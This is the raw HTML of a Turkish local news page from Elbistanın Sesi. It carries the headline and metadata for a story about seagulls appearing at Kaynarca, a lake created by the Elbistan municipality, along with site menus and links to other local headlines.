
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>Kaynarca’nın yeni konukları martılar oldu</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="Elbistan Belediyesi&#039;nin rekreasyon projesi kapsamında göl haline getirilen Kaynarca&#039;da görülen martılar görenleri şaşkına çevirdi."> <meta name="keywords" content=""> <meta name="news_keywords" content=""> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Kaynarca’nın yeni konukları martılar oldu"> <meta property="og:description" content="Elbistan Belediyesi&#039;nin rekreasyon projesi kapsamında göl haline getirilen Kaynarca&#039;da görülen martılar görenleri şaşkına çevirdi."> <meta property="og:url" content="http://www.elbistaninsesi.com/guncel/kaynarcanin-yeni-konuklari-martilar-oldu-h64749.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2019/11/kaynarcanin_yeni_konuklari_martilar_oldu_h64749_7699e.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Kaynarca’nın yeni konukları martılar oldu"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/kaynarcanin-yeni-konuklari-martilar-oldu-h64749.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="Kaynarca’nın yeni konukları martılar oldu"> <meta name="twitter:description" content="Elbistan Belediyesi’nin rekreasyon projesi kapsamında göl haline getirilen Kaynarca’da görülen martılar, görenleri şaşkına çevirdi."> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2019/11/kaynarcanin_yeni_konuklari_martilar_oldu_h64749_7699e.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href='http://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="http://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2019/11/kaynarcanin_yeni_konuklari_martilar_oldu_h64749_7699e.jpg" /> <meta itemprop="headline" content="Kaynarca’nın yeni konukları martılar oldu" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/kaynarcanin_yeni_konuklari_martilar_oldu_h64749_7699e.jpg" /> <meta itemprop="articleSection" content="Güncel" name="section" /> <meta itemprop="dateCreated" content="2019-11-11T18:04:03+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2019/11/kaynarcanin_yeni_konuklari_martilar_oldu_h64749_7699e.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate"></span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate"></span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate"></span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate"></span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/araba-fiyatina-ulasan-kurbanliklar-alici-bekliyor-h63829.html" title="Araba fiyatına ulaşan kurbanlıklar alıcı bekliyor" >Araba fiyatına ulaşan kurbanlıklar alıcı bekliyor</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/komur-sahasinda-gocuk-1-isci-hayatini-kaybetti-h60703.html" title="Kömür sahasında göçük: 1 işçi hayatını kaybetti" >Kömür sahasında göçük: 1 işçi hayatını kaybetti</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/unal-stk-temsilcileri-ile-sahurda-bulustu-h57204.html" title="Ünal STK temsilcileri ile sahurda buluştu" >Ünal STK temsilcileri ile sahurda buluştu</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/arslan-kudus-sahipsiz-degildir-h57124.html" title="Arslan: “Kudüs sahipsiz değildir”" >Arslan: “Kudüs sahipsiz değildir”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/politika/oztunc-24-haziranda-elbistanda-sandiklari-patlatacagiz-h56762.html" title="Öztunç: “24 Haziran’da Elbistan’da sandıkları patlatacağız”" >Öztunç: “24 Haziran’da Elbistan’da sandıkları patlatacağız”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/vefatlar/aziz-temur-anma-h55750.html" title="Aziz Temur Anma" >Aziz Temur Anma</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/ekonomi/kahramanmaras-kivisi-tezgahlardaki-yerini-aldi-h49076.html" title="Kahramanmaraş kivisi tezgahlardaki yerini aldı" >Kahramanmaraş kivisi tezgahlardaki yerini aldı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/politika/ak-partili-debgici-yeniden-aday-h49075.html" title="AK Parti’li Debgici yeniden aday" >AK Parti’li Debgici yeniden aday</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/haberde-insan/kadinlarin-kislik-yufka-ekmek-telasi-h49074.html" title="Kadınların kışlık yufka ekmek telaşı" >Kadınların kışlık yufka ekmek telaşı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/asayis/keci-otlatirken-kayaliklardan-dustu-h48619.html" title="Keçi otlatırken kayalıklardan düştü" >Keçi otlatırken kayalıklardan düştü</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="5f97e8ae23d371a82d7ffe3c7c9d7f21e359fe1e" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Kaynarca’nın yeni konukları martılar oldu" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/zeliha-deveci-74-yasinda-h64739.html" title="Zeliha Deveci 74 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/zeliha_deveci_74_yasinda_h64739_d35a3.jpg" alt="Zeliha Deveci 74 yaşında" /> Zeliha Deveci 74 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/hasan-eldek-82-yasinda-h64732.html" title="Hasan Eldek 82 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/hasan_eldek_82_yasinda_h64732_dd7d9.jpg" alt="Hasan Eldek 82 yaşında" /> Hasan Eldek 82 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-akdag-81-yasinda-h64726.html" title="Ahmet Akdağ 81 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/ahmet_akdag_81_yasinda_h64726_19a6a.jpg" alt="Ahmet Akdağ 81 yaşında" /> Ahmet Akdağ 81 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/anma-h64725.html" title="ANMA"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/anma_h64725_9864d.jpg" alt="ANMA" /> ANMA</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/kaynarcanin-yeni-konuklari-martilar-oldu-h64749.html" title="Kaynarca’nın yeni konukları martılar oldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/kaynarcanin_yeni_konuklari_martilar_oldu_h64749_7699e.jpg" alt="Kaynarca’nın yeni konukları martılar oldu" /> Kaynarca’nın yeni konukları martılar oldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/elbistanspor-farkli-yenildi-h64748.html" title="Elbistanspor, farklı yenildi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/elbistanspor_farkli_yenildi_h64748_920f0.jpg" alt="Elbistanspor, farklı yenildi" /> Elbistanspor, farklı yenildi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/dr-piskinden-gocere-ziyaret-h64747.html" title="Dr. Pişkin’den Göçer’e ziyaret"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/dr_piskinden_gocere_ziyaret_h64747_68a6b.jpg" alt="Dr. Pişkin’den Göçer’e ziyaret" /> Dr. Pişkin’den Göçer’e ziyaret</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/bahcesehir-kolejinde-nasil-basarili-oldum-paneli-h64746.html" title="Bahçeşehir Koleji’nde “Nasıl Başarılı Oldum?” Paneli"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/bahcesehir_kolejinde_nasil_basarili_oldum_paneli_h64746_17434.jpg" alt="Bahçeşehir Koleji’nde “Nasıl Başarılı Oldum?” Paneli" /> Bahçeşehir Koleji’nde “Nasıl Başarılı Oldum?” Paneli</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-eker-mazbatasini-aldi-h62471.html" title="Başkan Eker, mazbatasını aldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/baskan_eker_mazbatasini_aldi_h62471_6d495.JPG" alt="Başkan Eker, mazbatasını aldı" /> Başkan Eker, mazbatasını aldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/oztunctan-gungore-hayirli-olsun-ziyareti-h62469.html" title="Öztunç’tan Güngör’e hayırlı olsun ziyareti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/oztunctan_gungore_hayirli_olsun_ziyareti_h62469_f4649.jpg" alt="Öztunç’tan Güngör’e hayırlı olsun ziyareti" /> Öztunç’tan Güngör’e hayırlı olsun ziyareti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/iste-partilerin-oy-dagilimi-h62445.html" title="İşte partilerin oy dağılımı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/iste_partilerin_oy_dagilimi_h62445_7a2a4.JPG" alt="İşte partilerin oy dağılımı" /> İşte partilerin oy dağılımı</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspora-destek-cagrisi-h64681.html" title="Elbistanspor’a destek çağrısı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/elbistanspora_destek_cagrisi_h64681_b211e.jpg" alt="Elbistanspor’a destek çağrısı" /> Elbistanspor’a destek çağrısı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-evinde-sursuruspora-kukredi-h64659.html" title="Elbistanspor, evinde Sürsürüspor’a kükredi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/elbistanspor_evinde_sursuruspora_kukredi_h64659_f8aad.JPG" alt="Elbistanspor, evinde Sürsürüspor’a kükredi" /> Elbistanspor, evinde Sürsürüspor’a kükredi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanin-sultanlari-samsunda-3-1-kaybetti-h64658.html" title="Elbistan’ın Sultanları, Samsun’da 3-1 kaybetti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/elbistanin_sultanlari_samsunda_3_1_kaybetti_h64658_a3d8f.jpg" alt="Elbistan’ın Sultanları, Samsun’da 3-1 kaybetti" /> Elbistan’ın Sultanları, Samsun’da 3-1 kaybetti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanin-sultanlari-ankara-dan-zaferle-donuyor-h64521.html" title="‘Elbistan’ın Sultanları’ Ankara&#039;dan zaferle dönüyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/elbistanin_sultanlari_ankara_dan_zaferle_donuyor_h64521_7aaf3.jpg" alt="‘Elbistan’ın Sultanları’ Ankara&#039;dan zaferle dönüyor" /> ‘Elbistan’ın Sultanları’ Ankara&#039;dan zaferle dönüyor</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" /> Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/tedavi-sureclerinde-meslek-sahibi-olacaklar-h60414.html" title="Tedavi süreçlerinde meslek sahibi olacaklar"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2018/10/tedavi_sureclerinde_meslek_sahibi_olacaklar_h60414_dbbab.JPG" alt="Tedavi süreçlerinde meslek sahibi olacaklar" /> Tedavi süreçlerinde meslek sahibi olacaklar</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/kaynarcanin-yeni-konuklari-martilar-oldu-h64749.html" title="Kaynarca’nın yeni konukları martılar oldu" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/11/Ysimsiz-1_23.jpg" alt="Kaynarca’nın yeni konukları martılar oldu" class="pull-left" /> <div class="caption-line"><p>Kaynarca’nın yeni konukları martılar oldu</p></div> </a> </li> <li class="span3"><a 